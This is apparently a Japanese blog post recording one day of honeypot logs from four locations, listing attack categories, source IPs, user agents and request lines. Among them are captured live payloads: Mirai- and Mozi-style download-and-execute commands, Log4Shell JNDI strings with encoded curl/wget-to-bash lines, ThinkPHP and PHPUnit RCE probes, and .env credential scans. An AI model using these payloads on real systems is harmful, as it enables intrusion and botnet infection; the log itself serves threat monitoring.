コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/12/31 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/12/31分です。

特徴
共通

gbrmssによるスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
aiohttpによるスキャン行為
.cssへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  212.192.216.45/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws
cd /tmp;
rm -rf *;
wget  212.192.216.46/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws
cd /tmp;
rm -rf *;
wget  212.192.216.71/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws
Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
okhttpによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd+/tmp;
rm+-rf+*;
wget+ 212.192.216.46/bins/arm;
chmod+777+/tmp/arm;
sh+/tmp/arm+selfrep.jaws
cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:174 (前日比:65)
US:総アクセス数:106 (前日比:38)
UK:総アクセス数:45 (前日比:-7)
SG:総アクセス数:544 (前日比:472)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
2 20.102.81.95 United States
1 23.101.168.122 United States
1 23.183.82.177 United States
1 34.237.243.82 United States
1 40.121.67.45 United States
13 43.132.160.145 Singapore
1 45.61.188.222 United States
17 45.95.169.230 Croatia
1 45.143.200.118 Russia
8 47.252.35.224 United States
40 54.173.225.97 United States
1 58.249.82.19 China
1 87.121.52.88 Bulgaria
2 88.247.102.196 Turkey
3 89.248.165.52 United Kingdom
12 92.118.234.202 Latvia
1 100.26.250.76 United States
1 109.237.103.123 Russia
1 115.55.92.116 China
2 135.125.217.54 France
10 135.125.246.110 France
1 143.198.55.184 United States
1 144.126.209.23 United States
2 157.245.70.127 United States
1 159.203.32.101 United States
1 163.172.227.28 United Kingdom
2 165.232.137.148 United States
1 165.232.142.210 United States
32 172.104.140.107 United States
2 185.254.196.217 Ukraine
5 185.254.196.218 Ukraine
1 192.241.212.209 United States
1 192.241.212.227 United States
1 193.29.13.29 Romania
1 209.17.96.10 United States
1 209.141.53.74 United States

UserAgent一覧

件数 UserAgent
27 -
12 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
40 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
2 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
28 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible;)
2 Mozilla/5.0 zgrab/0.x
30 curl/7.54.0
2 curl/7.75.0
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x03
1 \x16\x03\x01\x01\x9c\x01
2 \x16\x03\x01\x01\xa6\x01
1 \x16\x03\x01\x01\xb3\x01
1 \x16\x03\x01\x01\xfa\x01
4 \x16\x03\x01\x02
3 \x16\x03\x01
1 \x16\x03\x02\x01\x99\x01
1 \x16\x03\x03\x01G\x01
1 \x16\x03\x03\x01U\x01
1 \x16\x03\x03\x01\x98\x01
2 \x16\x03\x03\x01\xa4\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /AlFi HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
2 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin.jhtml HTTP/1.1
1 GET /admin.pl HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base.inc HTTP/1.1
1 GET /base.jhtml HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /cli/.env HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /default.aspx HTTP/1.1
1 GET /default.pl HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /evox/about HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /getCommand?guid=SD-walker-pc-walker HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.cfm HTTP/1.1
1 GET /inicio.jsp HTTP/1.1
2 GET /java_script/template_1/game.js?v=1 HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /main.cfm HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /nmaplowercheck1640877168 HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//58[.]249[.]82[.]19:46444/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /start.jsp HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /text4041640851899 HTTP/1.1
1 GET /vod_installer/.env HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
12 GET http[:]//azenv[.]net/ HTTP/1.1
1 GET http[:]//www[.]msftncsi[.]com/ncsi.txt HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /index.htm HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
2 POST /sdk HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
1 3.144.122.77 United States
34 20.110.97.101 United States
2 20.119.227.45 United States
1 37.49.225.132 Belize
1 43.247.160.182 India
1 45.61.185.69 United States
6 51.79.29.48 Canada
1 51.81.193.228 United States
1 58.248.193.72 China
4 71.6.135.131 United States
1 89.163.242.196 Germany
13 92.118.234.202 Latvia
1 104.128.188.248 United States
1 109.237.103.123 Russia
6 137.184.221.114 United States
1 143.110.227.92 United States
1 143.198.55.184 United States
1 144.126.209.23 United States
1 147.182.195.163 United States
2 157.245.70.127 United States
1 164.92.215.114 United States
1 172.104.138.223 United States
1 185.107.195.5 Germany
2 185.180.143.138 Portugal
1 193.29.13.29 Romania
14 195.54.160.149 Russia
1 199.195.254.63 United States
1 209.17.96.218 United States
1 209.17.97.50 United States
2 209.141.53.74 United States

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}
11 -
13 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
13 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
34 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
23 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Python/3.7 aiohttp/3.7.4.post0
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01\x01\xfb\x01
2 \x16\x03\x01
24 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
2 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/config.php HTTP/1.1
2 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
2 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /fuel/modules/fuel/assets/css/fuel.css HTTP/1.1
1 GET /fuel HTTP/1.1
2 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
2 GET /java_script/template_1/game.js?v=1 HTTP/1.1
2 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /xmlrpc.php?rsd HTTP/1.1
13 GET http[:]//azenv[.]net/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
1 5.188.210.227 Russia
1 42.224.34.115 China
1 45.61.187.180 United States
1 45.61.188.24 United States
1 45.143.200.118 Russia
2 46.107.94.204 Hungary
1 66.240.205.34 United States
3 89.248.165.52 United Kingdom
12 92.118.234.202 Latvia
2 94.232.43.63 Russia
2 157.245.70.127 United States
1 157.245.207.127 United States
1 172.105.28.198 United States
1 172.105.152.112 United States
1 182.114.86.211 China
1 193.29.13.29 Romania
8 195.54.160.149 Russia
1 198.98.49.124 United States
1 198.199.92.190 United States
1 203.206.188.109 Australia
1 212.192.216.39 Czechia

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=}
18 -
12 Go-http-client/1.1
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/27.0.155813979 Mobile/14E304 Safari/602.1
1 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 Gh0st\xad
4 \x03
1 \x16\x03\x01\x01\xfc\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=} HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /admin/index.php?login HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
2 GET /java_script/template_1/game.js?v=1 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws
2 GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.71/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
12 GET http[:]//azenv[.]net/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.38 Romania
5 23.236.147.154 Canada
1 45.61.185.69 United States
1 45.61.188.222 United States
1 45.143.200.118 Russia
5 51.79.29.48 Canada
1 60.183.151.200 China
1 69.162.231.10 United States
3 89.248.165.52 United Kingdom
12 92.118.234.202 Latvia
2 94.232.43.63 Russia
1 103.209.254.94 Japan
1 103.209.254.95 Japan
10 106.15.225.180 China
14 107.172.73.224 United States
1 120.86.254.194 China
1 121.5.145.96 China
456 123.58.210.77 Hong Kong
1 143.244.189.0 United States
1 147.182.195.163 United States
1 147.182.232.128 United States
2 157.230.216.203 United States
1 159.223.169.4 United States
3 163.172.168.251 United Kingdom
1 185.136.167.62 Germany
1 189.48.190.103 Brazil
1 192.241.200.251 United States
1 192.241.207.100 United States
1 193.23.3.121 Russia
1 193.29.13.29 Romania
9 195.54.160.149 Russia
1 198.98.49.124 United States
1 209.17.96.50 United States
1 209.141.53.74 United States

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}
129 -
13 Go-http-client/1.1
1 Hello, world
1 Java/1.8.0_311
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)
1 Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36
339 Mozilla/5.0 (Linux; Android 8.1; EML-L29 Build/HUAWEIEML-L29; xx-xx) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 (iPad; iPhone; CPU iPhone OS 13_2_3 like Mac OS X)
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2; rv:52.8.0) Gecko/20100101 Firefox/52.8.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
11 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0
4 okhttp/3.3.1

リクエスト内容一覧

件数 Method Request Protocol
115 -
4 \x03
1 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT emby[.]media:443 HTTP/1.1
1 CONNECT www[.]bing[.]com:443 HTTP/1.1
11 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /202110/images/public.css HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} HTTP/1.1
1 GET /Content/Wap/base.css HTTP/1.1
1 GET /Content/favicon.ico HTTP/1.1
1 GET /Content/m_1/js/m_1_Jquery.js HTTP/1.1
1 GET /Css/Hm.css HTTP/1.1
1 GET /Home/Bind/binding HTTP/1.1
2 GET /Home/GetAllGameCategory HTTP/1.1
1 GET /JS/loginstatus.js HTTP/1.1
2 GET /Pc/Lang/index.html HTTP/1.1
1 GET /Public/Home/ecshe_css/main.css?v=1543997196 HTTP/1.1
1 GET /Public/Home/js/cls.js HTTP/1.1
2 GET /Public/Home/js/common.js HTTP/1.1
2 GET /Public/Mobile/ecshe_css/wapmain.css?v=1545408652 HTTP/1.1
2 GET /Public/Wchat/css/index.css HTTP/1.1
1 GET /Public/css/errorCss.css HTTP/1.1
2 GET /Public/home/common/js/index.js HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /Public/home/js/fukuang.js HTTP/1.1
1 GET /Public/home/wap/css/qdgame.css HTTP/1.1
1 GET /Public/initJs.php HTTP/1.1
1 GET /Public/uploads/web/step1.png HTTP/1.1
1 GET /Recruit/download_url HTTP/1.1
2 GET /Res/font/font.css HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /Template/Mobile/js/main.js HTTP/1.1
1 GET /Templates/user/finance/css/userPay.css HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /admin/index HTTP/1.1
1 GET /admin/webadmin.php?mod=do&act=login HTTP/1.1
1 GET /admin HTTP/1.1
2 GET /ajax/allcoin_a/id/0?t=0.3782499195965951 HTTP/1.1
1 GET /ajax?act=getrlist&rid=1 HTTP/1.1
1 GET /anquan/qgga.asp HTTP/1.1
2 GET /api/ApiHub/fetchJinse HTTP/1.1
1 GET /api/apps/config HTTP/1.1
2 GET /api/apps HTTP/1.1
1 GET /api/common/getConfig HTTP/1.1
2 GET /api/config-init HTTP/1.1
2 GET /api/config/info HTTP/1.1
1 GET /api/contactWay HTTP/1.1
1 GET /api/content_bottom HTTP/1.1
2 GET /api/customerServiceLink HTTP/1.1
1 GET /api/default/login-page HTTP/1.1
1 GET /api/getconfig.aspx HTTP/1.1
2 GET /api/home/index HTTP/1.1
2 GET /api/index/grailindex HTTP/1.1
1 GET /api/index/index HTTP/1.1
1 GET /api/index/loansList HTTP/1.1
1 GET /api/index/webconfig HTTP/1.1
2 GET /api/linkPF HTTP/1.1
1 GET /api/lottery/color HTTP/1.1
1 GET /api/message/webInfo HTTP/1.1
2 GET /api/pc/cms-config HTTP/1.1
2 GET /api/pc/configure HTTP/1.1
1 GET /api/product/info/1 HTTP/1.1
1 GET /api/public/?service=Home.getConfig HTTP/1.1
1 GET /api/site/getInfo.do HTTP/1.1
